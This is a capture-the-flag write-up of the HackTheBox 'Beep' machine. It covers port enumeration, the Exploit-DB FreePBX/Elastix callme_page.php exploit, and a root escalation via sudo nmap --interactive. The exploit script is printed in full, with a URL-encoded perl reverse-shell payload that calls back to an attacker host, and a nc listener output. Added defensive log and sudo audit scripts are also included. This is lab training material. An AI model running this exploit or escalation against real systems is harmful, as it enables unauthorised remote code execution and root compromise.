TJ_Null’s OSCP Prep – HTB – Beep

Beep is a Linux machine with a lot of ports open, so enumeration took a long time. There were many ways to exploit this machine, and to get root as well; however, I’ll not show all of them. The webserver is running a vulnerable version of Elastix, which results in RCE. The low-privileged user could run many commands as root via sudo, giving us a lot of options to escalate our privileges.


Enumeration

I’ll first start with an nmap scan.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/beep]
└─# nmap -sC -sV -p- --min-rate 10000 -oN nmap.result 10.10.10.7
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 15:29 EST
Stats: 0:01:41 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 93.75% done; ETC: 15:31 (0:00:06 remaining)
Nmap scan report for 10.10.10.7
Host is up (0.030s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: APOP LOGIN-DELAY(0) STLS PIPELINING UIDL USER RESP-CODES AUTH-RESP-CODE IMPLEMENTATION(Cyrus POP3 server v2) TOP EXPIRE(NEVER)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            875/udp   status
|_  100024  1            878/tcp   status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_imap-capabilities: BINARY Completed THREAD=ORDEREDSUBJECT LIST-SUBSCRIBED ACL UIDPLUS OK STARTTLS URLAUTHA0001 SORT=MODSEQ IMAP4 CATENATE CHILDREN IDLE MULTIAPPEND CONDSTORE X-NETSCAPE NAMESPACE UNSELECT MAILBOX-REFERRALS SORT LISTEXT RIGHTS=kxte ANNOTATEMORE ID RENAME NO IMAP4rev1 LITERAL+ THREAD=REFERENCES ATOMIC QUOTA
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
|_http-server-header: Apache/2.2.3 (CentOS)
|_ssl-date: 2022-01-19T21:34:53+00:00; +1h01m51s from scanner time.
| http-robots.txt: 1 disallowed entry 
|_/
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_http-title: Elastix - Login page
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-known-key: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
3306/tcp  open  mysql      MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: 1h01m50s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 316.87 seconds

There were many ports open. To make it easier to see all the open ports, I ran a second nmap scan, leaving out version detection (-sV) and the default scripts (-sC).

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/beep]
└─# nmap -p- --min-rate 10000 10.10.10.7                                                               
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-20 14:24 EST
Nmap scan report for beep.htb (10.10.10.7)
Host is up (0.068s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
143/tcp   open  imap
443/tcp   open  https
878/tcp   open  unknown
993/tcp   open  imaps
995/tcp   open  pop3s
3306/tcp  open  mysql
4190/tcp  open  sieve
4445/tcp  open  upnotifyp
4559/tcp  open  hylafax
5038/tcp  open  unknown
10000/tcp open  snet-sensor-mgmt

Enumerating all these ports took some time, so let’s take a look at the webserver running on port 80.

The webserver redirects us to HTTPS, where it is running Elastix. Elastix is a unified communications server that brings together IP PBX, email, IM, faxing and collaboration functionality, which explains all the open ports on this machine.

Running a gobuster scan against the webserver (over HTTPS, since port 80 redirects there). The -k flag skips SSL certificate verification; otherwise the scan will fail.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/beep]
└─# gobuster dir -u https://10.10.10.7 -w /usr/share/wordlists/dirb/big.txt -k 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

/.htaccess            (Status: 403) [Size: 287]
/.htpasswd            (Status: 403) [Size: 287]
/admin                (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/cgi-bin/             (Status: 403) [Size: 286]                                
/configs              (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
/favicon.ico          (Status: 200) [Size: 894]                                  
/help                 (Status: 301) [Size: 308] [--> https://10.10.10.7/help/]   
/images               (Status: 301) [Size: 310] [--> https://10.10.10.7/images/] 
/lang                 (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]   
/libs                 (Status: 301) [Size: 308] [--> https://10.10.10.7/libs/]   
/mail                 (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]   
/modules              (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
/panel                (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]  
/recordings           (Status: 301) [Size: 314] [--> https://10.10.10.7/recordings/]
/robots.txt           (Status: 200) [Size: 28]                                      
/static               (Status: 301) [Size: 310] [--> https://10.10.10.7/static/]    
/themes               (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/]    
/var                  (Status: 301) [Size: 307] [--> https://10.10.10.7/var/]       
/vtigercrm            (Status: 301) [Size: 313] [--> https://10.10.10.7/vtigercrm/] 
                                                                                    
===============================================================
2022/01/21 14:45:53 Finished
===============================================================

Going to /admin, we are prompted with a login popup. Clicking cancel, we are redirected to this page.

So we can see that the webserver is also running FreePBX 2.8.1.4.

A forum post I saw explained the difference between FreePBX and Elastix:

Asterisk started it all, and is the base platform switch under the covers handling the main switch functions.

Freepbx came along to make it easier to use GUI with some extra tools. Huge for new users.

Elastix leveraged Freepbx version and added applications like the call center that enables you to manage large call groups effectively. They also packaged several other great products with the platform to make the install a complete business communications platform.

https://www.elastix.org/community/threads/difference-between-elastix-freepbx-and-asterisk.115899/

Initial Access

There is a known pre-authentication vulnerability in FreePBX/Elastix, in the callme_page.php script of the recordings module, which gives us RCE (18650.py below, from Exploit-DB).

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/beep]
└─# cat 18650.py 
#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts, SSL update by Emporeo
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
############################################################
import urllib
import ssl
rhost="localhost"
lhost="10.10.14.17"
lport=4444
extension="233"

ssl._create_default_https_context = ssl._create_unverified_context

# Reverse shell payload

url = 'http://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urllib.urlopen(url)

In order for this script to work, we have to do a couple of things. Since this server is so old, the SSL cert is no longer valid and throws an error at us. You can either strip SSL or redirect traffic from localhost to 10.10.10.7:443 through Burp Suite, which is why rhost is set to localhost in the script.

Then you have to find an existing extension. Using the sipvicious svwar.py script, we can easily find it.

┌──(root💀kali)-[/home/…/HTB/beep/sipvicious/sipvicious]
└─# python3 svwar.py -m INVITE -e100-500 10.10.10.7     
| Extension | Authentication |
------------------------------
| 233       | reqauth        |

Starting a nc listener and running the script gives us a connection.

┌──(root💀kali)-[/home/aghanim]
└─# nc -lvnp 4444                     
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.7] 54087
whoami
asterisk

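As an added, defender-side example (not part of the original writeup): a small Python scanner that flags this callmenum injection in Apache access logs by URL-decoding each request to callme_page.php and looking for CRLF sequences or Asterisk call-file headers inside the callmenum parameter. The log lines are constructed, and the Data command in the sample is a harmless id.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log: only client IP, timestamp, method, path and status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Asterisk call-file headers that a legitimately dialled extension never contains.
CALLFILE_HEADER = re.compile(r"\b(application|data|channel)\s*:", re.IGNORECASE)
VULN_PATH = "/recordings/misc/callme_page.php"

def analyse_request(path):
    """Return the reasons a request looks like a callmenum injection ([] if clean)."""
    parts = urlsplit(path)
    if not parts.path.lower().endswith(VULN_PATH):
        return []
    reasons = []
    # Apache logs the raw request line, so %0D%0A is still encoded; parse_qs decodes it.
    for value in parse_qs(parts.query, keep_blank_values=True).get("callmenum", []):
        if "\r" in value or "\n" in value:
            reasons.append("CRLF in callmenum")
        if CALLFILE_HEADER.search(value):
            reasons.append("call-file header in callmenum")
    return reasons

def scan_log(text):
    """Return (ip, timestamp, path, reasons) for every flagged line of an access log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable/truncated line; a real tool would count these
        reasons = analyse_request(m.group("path"))
        if reasons:
            hits.append((m.group("ip"), m.group("ts"), m.group("path"), reasons))
    return hits

# Constructed sample: one injection attempt (Data: id, harmless), one legitimate
# call-me request and one unrelated request.
SAMPLE_LOG = """\
10.10.14.17 - - [19/Jan/2022:15:40:01 -0500] "GET /recordings/misc/callme_page.php?action=c&callmenum=233%40from-internal%2Fn%0D%0AApplication%3A%20system%0D%0AData%3A%20id%0D%0A%0D%0A HTTP/1.1" 200 512 "-" "Python-urllib/1.17"
10.10.14.17 - - [19/Jan/2022:15:40:05 -0500] "GET /recordings/misc/callme_page.php?action=c&callmenum=233 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.17 - - [19/Jan/2022:15:41:00 -0500] "GET /admin/ HTTP/1.1" 401 287 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, ts, path, reasons in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {', '.join(reasons)}")
```
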
Root

Running sudo -l as asterisk gives us a list of commands the user can run as root via sudo. Old versions of nmap (here 4.11) have an interactive mode in which !sh drops to a shell, so running it through sudo gives us a root shell.

bash-3.2$ sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
bash-3.2$ sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# 

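As an added, defender-side example (not the writeup's own code): a Python audit of the sudo -l listing above that parses each rule and rates passwordless root rules, marking nmap critical because its old interactive mode hands out a root shell as shown above. The SHELL_CAPABLE set is an assumption limited to what this page demonstrates.

```python
import re
from collections import namedtuple
Rule = namedtuple("Rule", "runas nopasswd command")
# Matches "(root) NOPASSWD: /usr/bin/nmap": run-as user, optional tags, command(s).
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")
SHELL_CAPABLE = {"nmap"}  # assumption: just the binary this page abuses (--interactive, !sh)

def parse_sudo_l(text):
    """Parse the rule section of `sudo -l` output into Rule tuples."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True  # everything before this line is the Defaults block
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            for cmd in m.group("cmds").split(","):  # "cmd1, cmd2" on one line is legal
                rules.append(Rule(m.group("runas"), "NOPASSWD:" in m.group("tags"), cmd.strip()))
    return rules

def audit(rules):
    """'critical' for root rules on shell-capable binaries, 'review' for other passwordless root rules."""
    findings = {}
    for r in rules:
        if r.runas.lower() not in ("root", "all"):
            continue
        if r.command.rsplit("/", 1)[-1] in SHELL_CAPABLE:
            findings[r.command] = "critical"
        elif r.nopasswd:
            findings[r.command] = "review"
    return findings

# The asterisk user's rules exactly as listed on this page (Defaults block omitted).
SUDO_L_OUTPUT = """\
User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
"""
```
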
What I’ve learned

  • This box was kind of overwhelming with how many ways there were to get a shell, as well as all the ports open. Understanding the connection between all the open ports is important.
  • Focusing on ports I know and not doing too much at the same time will surely increase my effectiveness.
  • Before doing an exploit, finish the enumeration stage. Document everything in a note-taking app. I use Obsidian for that, which is an amazing note-taking tool that uses Markdown.
